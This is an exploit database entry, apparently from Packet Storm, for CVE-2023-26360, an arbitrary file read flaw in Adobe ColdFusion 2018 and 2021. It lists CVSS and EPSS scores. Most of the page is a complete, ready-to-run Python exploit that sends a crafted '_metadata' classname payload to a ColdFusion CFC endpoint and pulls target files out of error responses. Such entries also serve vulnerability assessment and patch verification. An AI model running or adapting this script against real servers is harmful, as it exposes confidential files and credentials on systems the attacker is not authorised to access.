Adobe ColdFusion 2018,15 / 2021,5 Arbitrary File Read

2024-03-1100:00:00

Youssef Muhammad

packetstormsecurity.com

adobe coldfusion

file read

arbitrary exploit

cve-2023-26360

windows

linux

adobe

8.6 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

7.4 High

AI Score

Confidence

Low

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.961 High

EPSS

Percentile

99.5%

JSON

`# Exploit Title: File Read Arbitrary Exploit for CVE-2023-26360  
# Google Dork: [not]  
# Date: [12/28/2023]  
# Exploit Author: [Youssef Muhammad]  
# Vendor Homepage: [  
https://helpx.adobe.com/coldfusion/kb/coldfusion-downloads.html]  
# Software Link: [  
https://drive.google.com/drive/folders/17ryBnFhswxiE1sHrNByxMVPKfUnwqmp0]  
# Version: [Adobe ColdFusion versions 2018,15 (and earlier) and 2021,5 and  
earlier]  
# Tested on: [Windows, Linux]  
# CVE : [CVE-2023-26360]  
  
import sys  
import requests  
import json  
  
BANNER = """  
██████ ██ ██ ███████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████ ██████   
██ ██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ████   
██ ██ ██ █████ █████ █████ ██ ██ ██ █████ █████ █████ █████ ███████ █████ ███████ ██ ██ ██   
██ ██ ██ ██ ██ ████ ██ ██ ██ ██ ██ ██ ██ ██ ██ ████ ██   
██████ ████ ███████ ███████ ██████ ███████ ██████ ███████ ██████ ██████ ██████ ██████   
"""  
  
RED_COLOR = "\033[91m"  
GREEN_COLOR = "\032[42m"  
RESET_COLOR = "\033[0m"  
  
def print_banner():  
print(RED_COLOR + BANNER + " Developed by SecureLayer7" + RESET_COLOR)  
return 0  
  
def run_exploit(host, target_file, endpoint="/CFIDE/wizards/common/utils.cfc", proxy_url=None):  
if not endpoint.endswith('.cfc'):  
endpoint += '.cfc'  
  
if target_file.endswith('.cfc'):  
raise ValueError('The TARGET_FILE must not point to a .cfc')  
  
targeted_file = f"a/{target_file}"  
json_variables = json.dumps({"_metadata": {"classname": targeted_file}, "_variables": []})  
  
vars_get = {'method': 'test', '_cfclient': 'true'}  
uri = f'{host}{endpoint}'  
  
response = requests.post(uri, params=vars_get, data={'_variables': json_variables}, proxies={'http': proxy_url, 'https': proxy_url} if proxy_url else None)  
  
file_data = None  
splatter = '<!-- " ---></TD></TD></TD></TH></TH></TH>'  
  
if response.status_code in [404, 500] and splatter in response.text:  
file_data = response.text.split(splatter, 1)[0]  
  
if file_data is None:  
raise ValueError('Failed to read the file. Ensure the CFC_ENDPOINT, CFC_METHOD, and CFC_METHOD_PARAMETERS are set correctly, and that the endpoint is accessible.')  
  
print(file_data)  
  
# Save the output to a file  
output_file_name = 'output.txt'  
with open(output_file_name, 'w') as output_file:  
output_file.write(file_data)  
print(f"The output saved to {output_file_name}")  
  
if __name__ == "__main__":  
if not 3 <= len(sys.argv) <= 5:  
print("Usage: python3 script.py <host> <target_file> [endpoint] [proxy_url]")  
sys.exit(1)  
  
print_banner()  
  
host = sys.argv[1]  
target_file = sys.argv[2]  
endpoint = sys.argv[3] if len(sys.argv) > 3 else "/CFIDE/wizards/common/utils.cfc"  
proxy_url = sys.argv[4] if len(sys.argv) > 4 else None  
  
try:  
run_exploit(host, target_file, endpoint, proxy_url)  
except Exception as e:  
print(f"Error: {e}")  
  
  
`